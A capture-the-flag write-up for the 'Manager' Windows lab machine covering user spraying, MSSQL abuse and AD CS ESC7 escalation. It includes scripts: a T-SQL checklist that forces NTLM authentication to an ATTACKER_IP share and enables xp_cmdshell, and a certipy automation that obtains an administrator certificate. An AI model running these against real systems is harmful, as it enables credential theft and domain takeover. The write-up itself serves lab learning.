Last updated
Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
Nmap Scan
Summary
hosts file
Service Enumeration
HTTP Enumeration
I don't get anything new from fuzzing files and directories beyond what I find on the website itself.
There is not much in this web app, as it seems to be a static website, so I will switch to the other services running on this box.
SMB & RPC Enumeration
I don't get any useful permissions on the shares, but I get the users on the domain using RID brute-forcing.
Since I don't have any password yet, I will try each user's name as the password, and I get a hit.
I can brute-force the MSSQL login the same way, too.
With valid credentials, I will look at the share access and the MSSQL database. When I looked at the shares, I didn't find anything interesting, so I will move on to MSSQL.
And I'm in the database :))
When I deal with MSSQL, I go through a checklist of possible attack paths, so I will write one down:
Check for admin access
Check the databases for juicy info and secrets
Check the possibility of capturing the MSSQL service account's NetNTLM hash (by forcing an outbound SMB connection)
Check for impersonating other users
Check for trustworthy databases
Check for linked servers
Check for read or write access to the file system
Check for executing commands with xp_cmdshell
With this list, I can move forward, and I will use the mssqlclient.py built-in commands.
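The checklist above, expressed as T-SQL and fed to impacket's mssqlclient.py through its -file option (which executes one statement per line). This is an added example, not the writeup's own commands: the connection string, the attacker IP used for the hash-capture check and the wwwroot path are placeholders (assumptions), and none of the queries modify the server except the commented-out xp_cmdshell lines, which need sysadmin.

```shell
#!/bin/sh
# Added example (not from the original writeup): the MSSQL checklist as a
# statement-per-line file for `mssqlclient.py -file`. All hosts, credentials
# and paths are assumptions to be replaced.
set -e

# Write the checklist queries to the file given as $1, one statement per line
# (mssqlclient.py -file sends each line as its own batch).
write_mssql_checklist() {
    cat > "$1" <<'EOF'
-- 1. Admin access: are we sysadmin, and who are we?
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin, SYSTEM_USER AS login_name, USER_NAME() AS db_user;
-- 2. Databases (and 6. which of them are TRUSTWORTHY, where db_owner can escalate)
SELECT name, is_trustworthy_on FROM sys.databases;
-- 3. Force an outbound SMB auth to a listener (Responder/ntlmrelayx on ATTACKER_IP, assumption)
EXEC master..xp_dirtree '\\ATTACKER_IP\share', 1, 1;
-- 4. Logins we may EXECUTE AS (for IMPERSONATE the grantor is the impersonated login)
SELECT DISTINCT b.name AS impersonable_login FROM sys.server_permissions a JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
-- 5. Linked servers
EXEC sp_linkedservers;
-- 7. File system: depth 1, include files; OPENROWSET(BULK) needs ADMINISTER BULK OPERATIONS
EXEC master..xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
SELECT * FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS f;
-- 8. Command execution (sysadmin only; uncomment if step 1 returned 1)
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- EXEC xp_cmdshell 'whoami';
EOF
}

# Run the checklist against a target. Usage (assumption on the target string):
#   run_mssql_checklist 'DOMAIN/user:password@10.10.10.10'
# Use -windows-auth for a domain login; drop it for a native SQL login.
run_mssql_checklist() {
    tmp=$(mktemp)
    write_mssql_checklist "$tmp"
    mssqlclient.py -windows-auth -file "$tmp" "$1"
    rm -f "$tmp"
}
```

The xp_dirtree call against the attacker's share is the "capture the service account" check: whichever identity the SQL service runs as authenticates to the listener, which is why the writeup saw the machine account's hash rather than a user's.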
So far, I haven't found any viable path, and when I tried to capture the hash of the service account, I got the hash of the machine account instead, which is not crackable.
The last thing I can try is checking for read or write access to the file system. I will use xp_dirtree to list the directories in a path.
With an IIS web server running on the box, I can try to read web.config or other important files under its directory, inetpub. Here there are several interesting files: web.config and website-backup-27-07-23-old.zip.
When I tried to access web.config through the web server, it gave me a "file not found" error (IIS request filtering never serves web.config over HTTP, so this is expected), but when I tried to access the .zip file, it was downloaded.
I created a new directory, moved the zip file into it, unzipped it, and listed the contents. There is an odd .xml file, which contains credentials for the raven user.
These credentials are valid, and I have access over WinRM, too :))
User Flag: 518fbc8e81299098bac6xxxxxxxxxxxxx
Looking at the account's privileges and groups, I noticed that raven is a member of Certificate Service DCOM Access, which indicates that a PKI (AD CS) exists in the domain.
I can confirm this with NetExec using the ADCS module.
When dealing with AD CS, I immediately enumerate the possible escalation (ESC) paths using certipy.
Then I also use certipy to find vulnerable templates or permissions.
The user raven has Enroll and ManageCA rights on the CA, which means he can request certificates and administer the CA itself: enable or disable templates and grant CA permissions (including ManageCertificates) to any principal. That is the precondition for ESC7.
The built-in SubCA template is also enabled (as it is by default). This template is vulnerable to ESC1, since the enrollee supplies the subject, but it only permits Domain Admins and Enterprise Admins to enroll.
The template is present and enabled (Enabled: True). If the SubCA template were disabled, we would have to enable it first using our ManageCA rights.
Since we have ManageCA rights, we can also assign ManageCertificates rights to any account, including raven himself.
Exploitation Path
Enable the SubCA template
Grant ManageCertificates rights
Request a certificate for the SubCA template impersonating the administrator
Approve the enrollment request as raven
Access the machine as an administrator
Grant ManageCertificates rights
Confirm the new permission
With the SubCA template enabled and with ManageCertificates rights, we can request a certificate, adding an alternative SAN for the administrator and selecting the SubCA template. The request is refused because raven is not allowed to enroll in SubCA, but it is stored on the CA with a request ID.
We need to save the request ID (20) and respond yes to the question "Would you like to save the private key? (y/N)". We will need this private key to retrieve the certificate later, once the request has been approved.
Now I can authenticate as the administrator with the .pfx file.
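The whole ESC7 chain from the exploitation path above, scripted around certipy so that the request ID is read from certipy's output instead of being copied by hand. This is an added example, not the writeup's own commands: the domain, DC IP, CA name and password are placeholders (assumptions), the request-ID line format is certipy's "[*] Request ID is N" message, and feeding "y" on stdin to answer the save-private-key prompt is an assumption about how that prompt is read.

```shell
#!/bin/sh
# Added example (not from the original writeup): ESC7 via certipy.
# Every value below except the user name and template is an assumption.
set -e

DOMAIN='DOMAIN.LOCAL'       # assumption: target domain
DC_IP='10.10.10.10'         # assumption: domain controller, also hosting the CA here
CA_NAME='CA-NAME'           # assumption: CA name as reported by `certipy find`
LOW_USER='raven'            # low-privileged user holding Enroll + ManageCA
LOW_PASS='password'         # assumption
TARGET_UPN="administrator@$DOMAIN"
AUTH="-u $LOW_USER@$DOMAIN -p $LOW_PASS -dc-ip $DC_IP"

# Pull the numeric request ID out of certipy's "[*] Request ID is N" line;
# prints nothing if the line is absent.
extract_request_id() {
    sed -n 's/.*Request ID is \([0-9][0-9]*\).*/\1/p' | head -n 1
}

esc7_chain() {
    # 1. Enable the SubCA template on the CA (needs ManageCA).
    certipy ca -ca "$CA_NAME" -enable-template SubCA $AUTH
    # 2. Grant ourselves ManageCertificates, i.e. make raven a CA officer (needs ManageCA).
    certipy ca -ca "$CA_NAME" -add-officer "$LOW_USER" $AUTH
    # 3. Request a SubCA certificate with the administrator UPN as SAN. The CA
    #    refuses it for a non-admin enrollee but keeps it under a request ID;
    #    we answer "y" so certipy saves the private key as <id>.key.
    out=$(printf 'y\n' | certipy req -ca "$CA_NAME" -template SubCA -upn "$TARGET_UPN" \
            -target "$DC_IP" $AUTH 2>&1)
    printf '%s\n' "$out" >&2
    req_id=$(printf '%s\n' "$out" | extract_request_id)
    [ -n "$req_id" ] || { echo "no request ID in certipy output" >&2; return 1; }
    # 4. Approve the stored request as an officer (needs ManageCertificates).
    certipy ca -ca "$CA_NAME" -issue-request "$req_id" $AUTH
    # 5. Retrieve the issued certificate; certipy pairs it with the saved <id>.key
    #    and writes administrator.pfx.
    certipy req -ca "$CA_NAME" -retrieve "$req_id" -target "$DC_IP" $AUTH
    # 6. PKINIT as administrator with the .pfx: yields a TGT and the NT hash.
    certipy auth -pfx administrator.pfx -dc-ip "$DC_IP"
}

# Only run the chain when explicitly asked, so the helper can be sourced offline.
if [ "${ESC7_RUN:-0}" = "1" ]; then
    esc7_chain
fi
```

Run it with `ESC7_RUN=1 sh esc7.sh` after filling in the placeholders. Step 3 is the one that is easy to get wrong by hand: if the private key is not saved at request time, the certificate retrieved in step 5 cannot be paired with a key and the .pfx is useless.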
Access the machine
Root Flag: 5fa4f9480b1bba44627exxxxxxxxxxxxxxxx